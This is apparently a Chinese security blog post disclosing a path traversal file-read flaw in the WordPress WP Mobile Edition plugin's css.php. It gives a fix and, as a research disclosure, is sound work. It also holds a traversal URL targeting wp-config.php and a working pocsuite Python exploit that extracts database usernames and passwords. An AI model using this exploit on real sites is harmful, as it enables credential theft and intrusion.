影响:

  • WP Mobile Edition版本低于2.2.7有该漏洞。
  • 首次启用WP Mobile Edition 插件之后,即使停用或删除该插件,漏洞也会一直存在。
  • 即使升级插件,若已经启用过漏洞存在的版本,漏洞也同样存在。
  • css.php用于压缩css文件,并不只存在于该插件之中,而是 https://github.com/mrclay/ 的开源代码,使用该文件的网站也存在该漏洞。

详情

插件下载地址:https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip

首次启用该插件,插件会自动安装一个theme:mTheme-Unus。该theme下css/css.php文件存在任意文件可读漏洞。
漏洞代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
foreach ($files as $file)
{
$content .= file_get_contents($file);
}

// Remove comments
$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $content);

// Remove tabs, spaces, newlines, etc...
$content = str_replace(array("\r", "\n", "\t", ' ', ' '), '', $content);

// Delete cache files older than an hour
$oldDate = time()-3600;
$cachedFiles = scandir($cachePath);
foreach ($cachedFiles as $file)
{
$filemtime = @filemtime($cachePath.$file);
if (strlen($file) == 32 and ($filemtime === false or $filemtime < $oldDate))
{
unlink($cachePath.$file);
}
}

// Write cache file
file_put_contents($cachePath.$md5, $content);

// Output
echo $content;


file_get_contents()读取$file路径的内容之后,echo输出,导致漏洞。
删除,更新,停用该插件,并不会影响到漏洞存在的文件。

漏洞证明:

更新至:2.8版本

访问:website/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

漏洞依旧存在。

漏洞修复建议:

删除wp-content/themes/mTheme-Unus/css/css.php文件。

POC&EXP:

注:基于pocsuite

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python
# -*- coding:utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
vulID = ''
version = '1'
author = ['nearg1e']
vulDate = '2015-10-10'
createDate = '2015-10-10'
references = ['']
name = 'WordPress WP Mobile Edition Plugin 2.2.7 /wp-content/themes/mTheme-Unus/css/css.php 文件下载'
appPowerLink = 'https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip'
appName = 'WordPress WP Mobile Edition Plugin'
appVersion = '2.2.7'
vulType = 'Local File Inclusion'
desc = '''file_get_contents()读取$file路径的内容之后,echo输出,导致漏洞。'''
samples = []

def _attack(self):
import re
result = {}
exp_url = '%swp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' % self.url
try:
requ = req.get(exp_url, timeout=10).content
except Exception, e:
self.result.error = str(e)
return
re_str = r"define\('DB_USER', '(.*)'\);[\s\S]*define\('DB_PASSWORD', '(.*)'\);"
re_result = re.findall(re_str, requ)
if re_result:
result['DB_USER'] = re_result[0][0]
result['DB_PASSWORD'] = re_result[0][1]
return self.parse_attack(result)

def _verify(self, verify=True):
result = {}
vul_url = '%swp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' % self.url
response = req.get(vul_url, timeout=10).content
if 'define(\'WP_DEBUG\'' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)

def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output

register(TestPOC)

poc执行结果:

本博客所有内容只用于安全研究,请勿用于恶意攻击。
本文URL: "https://blog.neargle.com/2015/10/10/wp-mobile-edition-pn-cssphp-arbitrary-flie-dl/index.html"